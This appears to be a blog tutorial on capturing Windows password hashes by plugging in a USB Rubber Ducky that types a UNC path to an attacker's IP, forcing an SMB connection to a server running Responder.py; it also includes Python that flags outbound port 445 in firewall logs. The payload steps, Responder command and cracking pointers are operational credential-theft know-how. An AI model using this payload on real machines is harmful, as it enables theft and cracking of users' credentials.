
Capturing Windows Hashes – USB Rubber Ducky

Capturing Hashes – Introduction

I spotted a tweet earlier this week from the Hak5 crew, makers of the USB Rubber Ducky. The tweet was based around capturing Windows hashes with a payload that sends an SMB request from the victim machine to your attack machine.

You can read Hak5’s original post about the topic here:

https://hakshop.com/blogs/news/whats-the-quickest-way-to-steal-a-windows-password-hash

Requirements

To get this working successfully, you will need the following:

  1. USB Rubber Ducky
  2. Generated Payload
  3. A server running Responder.py waiting to capture the hashes from the SMB request

Generating the Payload

Payload

Hak5 has a publicly available payload generator (Duck Toolkit), which produces a .bat file containing the malicious payload. It’s nice and easy: paste your payload into the generator, click ‘Generate Script’ and then select the file you wish to use (Inject.bin).


In the screenshot above, you can see how simple the payload really is.

REM = Remarks (notes/instructions from the author; not typed on the target)
DELAY = Time to wait, in milliseconds (1000 = 1 second)
GUI r = Open the Windows Run dialog (Windows key + R)
DELAY 100 = Wait 100 ms for the Run dialog to appear
STRING = The text typed into the Run dialog: \\<ATTACK IP ADDRESS> (a UNC path, which makes Windows attempt an SMB connection to that host)
ENTER = Press Enter (OK)

Place the .bin file onto the micro SD card and get ready to fire it up! But before you do, remember to start responder.py…

Server Running Responder.py

I personally have a cloud-hosted server for testing (Ubuntu). Firstly you have to git clone responder.py and then run responder.py as root:

sudo python responder.py -I eth0 -fvw

Now Responder is listening, waiting for them sweet, sweet hashes 😀

When you plug the Rubber Ducky into the victim’s machine, it runs the payload within two seconds, which will look like this:

If outbound TCP 445 is allowed from the victim’s network (blocking SMB egress is what stops this step), you will start to capture the victim’s login credentials and password hash.
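That outbound TCP 445 condition is also the place a defender can catch this. As an added example (not from the original post, and not part of Hak5’s or Responder’s code), the Python below scans constructed firewall log lines in an assumed key/value format and flags SMB connections leaving the network, whether the firewall allowed or denied them:

```python
import ipaddress
import re

# Constructed sample firewall log lines (not from the original post). The
# "action= proto= src= dst=" key/value layout is an assumed, generic format.
SAMPLE_LOG = """\
2024-05-01T09:12:01 fw01 action=allow proto=tcp src=10.0.5.23:51822 dst=10.0.1.7:445
2024-05-01T09:12:03 fw01 action=allow proto=tcp src=10.0.5.23:51830 dst=203.0.113.9:445
2024-05-01T09:12:04 fw01 action=allow proto=tcp src=10.0.5.23:51831 dst=203.0.113.9:443
2024-05-01T09:12:09 fw01 action=deny proto=tcp src=10.0.5.40:49201 dst=198.51.100.4:445
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) action=(?P<action>\w+) proto=(?P<proto>\w+) "
    r"src=(?P<src>[\d.]+):(?P<sport>\d+) dst=(?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Ranges treated as "inside the network": RFC 1918, loopback, link-local.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def find_outbound_smb(log_text):
    """Return (src, dst, action) for every TCP 445 connection to an external host.

    An 'allow' hit means a hash could have left the network; a 'deny' hit shows
    the egress filter worked, but the attempt itself is still worth an alert.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["proto"] == "tcp" and rec["dport"] == 445 and not is_internal(rec["dst"]):
            hits.append((rec["src"], rec["dst"], rec["action"]))
    return hits
```

The internal SMB connection to 10.0.1.7 and the HTTPS connection to the external host are ignored; only the two port 445 connections to external addresses are reported.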

Victim’s username and hash

You’re now ready to crack the hash offline! What are the chances the user has the same password for other accounts? Hmmmm!

There’s more about cracking hashes in one of my other posts – http://178.62.123.49/wifi-hacking/